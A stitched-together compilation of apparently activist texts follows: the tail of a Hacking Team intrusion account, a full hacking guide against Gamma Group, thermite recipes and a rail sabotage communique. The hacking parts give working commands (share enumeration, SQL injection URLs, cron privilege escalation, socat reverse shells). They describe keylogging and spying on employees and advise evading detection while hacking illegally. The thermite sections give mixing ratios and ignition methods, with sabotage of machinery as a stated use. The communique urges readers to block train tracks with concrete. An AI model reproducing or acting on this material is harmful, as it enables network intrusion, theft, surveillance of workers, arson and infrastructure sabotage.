The best tool these days for understanding windows networks is Powerview [1].
It’s worth reading everything written by it’s author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
“net view”. Other techniques that I like are:

1) Downloading a list of file names

With a Domain Admin account, you can download a list of all filenames in
the network with powerview:

Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string ‘^(.*) \t-‘ | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}

Later, you can read it at your leisure and choose which files to download.

2) Reading email

As we’ve already seen, you can download email with powershell, and it has a
lot of useful information.

3) Reading sharepoint

It’s another place where many businesses store a lot of important
information. It can also be downloaded with powershell [10].

4) Active Directory [11]

It has a lot of useful information about users and computers. Without being
Domain Admin, you can already get a lot of info with powerview and other
tools [12]. After getting Domain Admin, you should export all the AD
information with csvde or another tool.

5) Spy on the employees

One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
(one of Hacking Team’s sysadmins) gave me access to a Nagios server which
gave me access to the rete sviluppo (development network with the source
code of RCS). With a simple combination of Get-Keystrokes and
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
[14], and GPO, you can spy on any employee, or even on the whole domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang

–[ 14 – Hunting Sysadmins ]—————————————————-

Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important – the “Rete Sviluppo”, an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I’d
already gotten admin access. Mauro Romeo’s computer didn’t have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he’d mounted it and then copied off the
files. Many have made fun of Christian Pozzi’s weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/

–[ 15 – The bridge ]———————————————————–

Within Christian Pozzi’s Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I’d found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it’s an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78

–[ 16 – Reusing and resetting passwords ]————————————–

Reading the emails, I’d seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the “forgot my password” function along with
my access to their mail server to reset the passwords.

–[ 17 – Conclusion ]———————————————————–

That’s all it takes to take down a company and stop their human rights abuses.
That’s the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.

Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don’t attack systems you
don’t have permission to, etc. I’ll say the same, but with a more rebellious
conception of “ethical” hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves “ethical hackers” just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.

Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I’d like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.

[1] https://twitter.com/coracurrier/status/618104723263090688

–[ 18 – Contact ]————————————————————–

To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

only encrypted email please:
https://securityinabox.org/es/thunderbird_usarenigmail
—–BEGIN PGP PUBLIC KEY BLOCK—–

mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
—–END PGP PUBLIC KEY BLOCK—–

HackBack 1

A DIY Guide for those without the patience to wait for whistleblowers

From Pastebin (where it has better formatting)

–[ 1 ]– Introduction

I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you’ve learned the basics you’ll realize this
really is easier than filing a FOIA request.

–[ 2 ]– Staying Safe

This is illegal, so you’ll need to take same basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it’s better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
here.

[0] https://truecrypt.ch/downloads/
[1] https://www.whonix.org/wiki/Download#Install_Whonix

As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you’ll want a public IP address to
receive connect back shells. I recommend using servers you’ve hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you’re running will
have a nice fast connection to your target.

–[ 3 ]– Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.

[0] http://ha.ckers.org/fierce/

For an example let’s take Blackwater. We start out knowing their homepage is at
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com

Now we do whois lookups and find the homepage of www.academi.com is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: 67.238.84.224 – 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd

Doing a whois lookup on academi.com reveals it’s also registered to the same
address, so we’ll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
“850 Puddin Ridge Rd” inurl:ip-address-lookup
“850 Puddin Ridge Rd” inurl:domaintools

Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you’ve found everything.

Also just google the organization and browse around its websites. For example on
academi.com we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com

If you repeat the whois lookups and such you’ll find academiproshop.com seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
was simply a whois lookup of finfisher.com which found it registered to the name
“FinFisher GmbH”. Googling for:
“FinFisher GmbH” inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com

…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.

–[ 4 ]– Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn’t? Sometimes companies will have services
running that require no authentication and just assume it’s safe because the url
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
default password.

3) Is it running an old version of software vulnerable to a public exploit?

Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren’t intended
for public viewing like test.company.com or dev.company.com you’ll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.

6) For the non-custom software they’re running, get a copy to look at. If it’s
free software you can just download it. If it’s proprietary you can usually
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that’s easier to hack, and get a copy from them.

[0] http://www.cirt.net/nikto2
[1] http://www.morningstarsecurity.com/research/whatweb
[2] http://wpscan.org/
[3] https://code.google.com/p/cms-explorer/
[4] http://sourceforge.net/projects/joomscan/
[5] https://code.google.com/p/zaproxy/

For finsupport.finfisher.com the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn’t recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
software.

* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
allinurl:”Scripts/scripts.js.php”

* I find there’s a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group…”

But it’s really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:

* google allinurl:”Scripts/scripts.js.php” and find the other sites

* Notice they’re all sql injectable in the first url parameter I try.

* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
the option –tamper=’tamper/modsecurityversioned.py’

* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website’s source code.

[0] http://sqlmap.org/
[1] https://epinna.github.io/Weevely/

Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
javascript, and if you’re unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.

[0] http://www.dvwa.co.uk/

Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
sqli (it’s nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap –file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support
tickets, and there’s no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I’m in!

–[ 5 ]– (fail at) Escalating

___________

———–
\ ^__^
\ (oo)\_______
(__)\ )\/\
||—-w |
|| ||
^^^^^^^^^^^^^^^^

Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].

[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
[1] https://code.google.com/p/unix-privesc-check/

finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and ….nothing. Turns out that while the cron process is running
it doesn’t seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn’t update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that’s probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn’t get much of anything new, so I move
on to the rest of the network.

–[ 6 ]– Pivoting

The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport’s local network was another
webserver serving up a folder called ‘qateam’ containing their mobile malware.

–[ 7 ]– Have Fun

Once you’re in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there’s no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
already so I can move on to step 2!

–[ 8 ]– Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There’s no one right way, and any method that works is as good as
any other. The other main ways that I’ll state without going into detail are:

1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don’t
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There’s also
metasploit browser autopwn, but you’ll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: “Social Engineering”. This is probably the way to go if you don’t know
too much about computers, and it really is all it takes to be a successful
hacker [0].

[0] https://www.youtube.com/watch?v=DB6ywr9fngU

–[ 9 ]– Resources

Links:

* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
(all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.

Books:

* The Web Application Hacker’s Handbook
* Hacking: The Art of Exploitation
* The Database Hacker’s Handbook
* The Art of Software Security Assessment
* A Bug Hunter’s Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.

–[ 10 ]– Outro

You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
customers are targeting and with what purpose that makes them evil. That’s not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it’s cheaper to attack than to defend it’s harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!

How to Make Thermite

Recipe 1

From the Thermate recipe in Arson Around With Auntie ALF: “Thermate is similar to commercial thermite, used in welding, except that it also contains an oxidizer, making it easier to ignite. Thermate will readily burn paper, rags, excelsior, straw, and other tinder type materials. However, its main use in sabotage operations is against motors, gears, lathes, or other metal targets – to weld moving parts together, warp precision machined surfaces, and so on. Since it burns with a brief, almost explosive action, it is not recommended for burning wooden structures or other materials where persistent heat is required.”

Recipe 2

From Weekend Science Projects

Thermite is an incendiary reaction that can burn as hot as 2500°C or more. That means that if you lit a pound of thermite on top of your car it would melt through your hood, through your engine, through your driveway, and make a hole in the ground. Thermite is a reaction between a metal (aluminum, magnesium) and a metal oxide (iron oxide, copper oxide, manganese oxide…) this reaction has a high ignition temperature, but once its ignited it supplies it’s own oxygen. This allows for some interesting applications, for example thermite is still used today for underwater welding.

Safety Precautions

Before you get started, you must realize that what you are about to do is a dangerous and energetic reaction that should only be performed with the utmost care. Besides its ridiculously high temperature, thermite also emits UV radiation that can do permanent damage to your eyes and if you don’t want to wear a welding mask, at least put on a pair of good quality sun glasses. Also, metals with a low melting point (zinc, lead) will vaporize and explode if near the thermite reaction.

Supplies

There are many kinds of thermite, but the most common uses iron oxide and aluminum powder, both of which can be made at home (see my instructions for How to Make Iron Oxide and How to Make Aluminum Powder). You also need a way to ignite the thermite. Most people use magnesium ribbon, but I haven’t had much luck with that and usually use potassium permanganate and glycerine. Potassium permanganate is a filter cleaner and a dye sold at hardware stores.

Glycerine is a skin care produce and can be found at any drug store like CVS. When mixed they spurt flames like my mother’s cooking. Additional things that you might want include a flowerpot to contain the mixture while it’s burning, bricks to hold it up, and something to melt. If you don’t have anything to destroy, at the very least just put some sand under it to keep it from ruining your driveway. What ever you do, don’t use water to catch the drops. Water will instantly vaporize, explode, and spray you with molten iron- generally something to avoid. If you’re interested, this is an example of what happens when you have even the slightest amount of moisture.

1. By weight the ratio of iron oxide to aluminum powder is 8-3. Both should be powdered as fine as possible as this will make it burn hotter and ignite easier. Measure them out, and mix as thoroughly as possible- this will make it burn faster and hotter and is well worth your time.

2. Pour the thermite into your container. Flower pots are most commonly used, but almost anything will work. Flower pots are used because clay is one of the only materials that will still be there after hell has reigned. If you do use a flower pot, you should consider using two. The second pot will contain the shards of the first and reduce the risk of it breaking halfway through. The only thing that I would advise against is glass as it might shatter before it melts.

3. If you’re using magnesium, stick it in, fray the top to make it easier to light, and light it. If you’re using potassium permanganate, then pour it in, mix it in a little bit with the thermite, and add the glycerine. Rule of thumb is two to three parts glycerine to one part potassium permanganate. It usually helps to stir the ingredients after you add the glycerine. If it still won’t light, adding powdered magnesium or powder rubbed off of a sparkler makes it easier to ignite. Whatever you do, stand way back.

4. If it lights, then yell, cheer, and behold the awesome power of thermite. If it doesn’t light, then re-evaluate and try something different.

Recipe 3

From Skylighter

What is Thermite?

Thermite is a pyrotechnic composition usually consisting of metal powder and a metal oxide. It is not usually explosive, but it does create extremely high temperatures in a very small area for a short period of time. For instance, aluminum/iron-oxide thermite temperatures are as high as 4500 degrees F.

Thermite is used for welding, metal cutting or boring, field-expedient metal repairs, science demonstrations, high temperature ignition, disabling military equipment (including artillery, document files, and hard drives), and other applications.

Making Thermite Using Red Iron Oxide

Having the correct balance of fuel and oxidizer is key to having a stable burn in a thermite reaction. The thermite recipe for red iron oxide and aluminum is 3 parts iron oxide red to 1 part aluminum fuel. In pyrotechnic compositions the finer the ingredients and more well mixed they are, generally the easier it is to ignite, and the faster the reaction will progress.

So our goals in selecting thermite ingredients are ease of ignition and a stable, non-explosive burn.

For this example, we are using Skylighter’s -325 mesh red iron oxide and Skylighter’s -325 mesh bright aluminum, which has an average particle size of 45 microns.

Thermite#1 Mixture

Ingredient Parts by Wt.    Parts by %
Red iron oxide -325 mesh 3 75
Aluminum flake -325 mesh 1 25
      Total 100%

To make a 4 ounce batch of thermite, first weigh out 3 ounces of red iron oxide. Then weigh out 1 ounce of aluminum powder. Dump them into a plastic tub, and put the top on. Shake them until the color is consistent throughout.

Then pass the mix through a 20-mesh or finer screen. If there are any clumps break them up with your fingers. Screen the mix two more times, or more, until you have a uniformly colored powder.

Note: Using a 40-mesh or finer screen will make the mix much easier to ignite.

This can be a dusty process, so be sure and do it an area where the aluminum dust will not cause a problem. Do not try this where air is moving. The better you mix the ingredient, the faster and hotter the reaction will be. Thermite needs a very high temperature to ignite it.

Your thermite kit comes with 6 gold sparklers. The iron in them burns at around 1800 degrees F.

Here’s how to use sparklers to ignite your thermite. Place your thermite mix in a plastic tub. Make a hole near the bottom on the side of the tub big enough for a sparkler to go through.

Push 1 to 2 of inches of the sparkler through the hole in the side of the tub into the mix inside. Leave at least 2-3 inches of your sparkler sticking out. Place the plastic tub on a metal surface that want to burn through. Light the sparkler, and get back 40 or 50 feet.

WARNING: Do NOT attempt to ignite your thermite by dipping your sparkler into the mix by hand. The mix can and does ignite violently, and will spray you with burning metal.

WARNING: A violent ignition of thermite can throw molten metal in all directions. Do not stand close to the mix when it is igniting or burning.

TIP: If you have trouble igniting your thermite with a sparkler, try mixing some magnesium powder or chips into a small amount of thermite mix. Then you should be able to ignite the magnesium mix using your sparkler.

WARNING: Thermite burns extremely hot and produces molten iron slag that can melt though a car’s engine block! Burning thermite can spatter molten iron a long way from the burning pile. Stay as far back as you can. And make sure there is nothing nearby that can catch fire. Start your thermite experiments with small amounts at first, until you understand how it behaves, and how far it will throw molten metal slag.

WARNING: You cannot extinguish a thermite fire with water. Do not attempt to put the fire out with water, or you may have a violent, steam explosion, which can throw molten slag as well. Likewise, do not use any wet materials to attempt to extinguish the fire.

Train Tracks Sabotaged With Concrete

(Technical details are in bold.)

Early in the morning of April 20th we poured concrete on the train tracks that lead out of the Port of Olympia to block any trains from using the tracks. We took precautions to notify BNSF (the train company) – we called them and we used wires to send a signal that the tracks were blocked. We did this not to avoid damaging a train, nothing would bring bigger grins to our faces, but to avoid the risk of injuring railway workers.

This action was done to disrupt the movement of trains carrying proppants used in natural gas fracturing. These train tracks are part of a system of pipelines, fracking wells, mines, clearcuts, control centers, fiberoptics, dams, highways and factories that cover the planet and are physical manifestations of a process that is destroying the ecosystems, cultures, and inhabitants everywhere. Behind this network of infrastructure there are politicians, CEOs and bureaucrats who have private security, cops, prison guards, non-profit directors, PR consultants and the legacy of 500 years of colonization to back them up. We oppose all of these manifestations, infrastructural, personal and ideological. We blocked the train tracks because we want to blockade the entire web of domination that is slowly killing us.

We were inspired to take this action by acts of resistance taking place across turtle island and the world, particularly the fierce indigenous resistance of water protectors against the Dakota Access Pipe Line, the encampment blocking a train full of fracking material on these same tracks in Olympia this past November, and the clandestine attacks against pipelines in Florida, South Dakota and Iowa.

We also were emboldened by the spirit of all those who have risen against the white supremacist police in Ferguson, Baltimore, Oakland and elsewhere, as well as by the riotous opposition that has characterized the first few months of Donald Trump’s reign.

Resistance to this many-tendriled death machine has and must take many forms. Some have set their goals narrow and try just to stop the port from shipping proppants. We are aiming beyond, for a liberation that destroys all vestiges of oppression and colonization leaving us free to experiment with ways of living in cooperation on our own terms. We want to unlearn the legacies of domination that we have inherited. We need a diverse and vibrant resistance composed of more forms of destruction, mutual aid and solidarity than we can yet imagine.

This action and actions like it are quite easy to do yourself. This only took a few hours and a little bit of planning. The hardest part was calming our nerves. Particularly easy was placing wire on the tracks to send a signal to the train company that the tracks were blocked. This action can and has been easily repeated wherever train tracks are. For more info on how to do this check out this explanatory video.

Concrete on the tracks is just a start
Rest in Power James Marker!
Free Red Fawn!

-some anarchists

From Puget Sound Anarchists

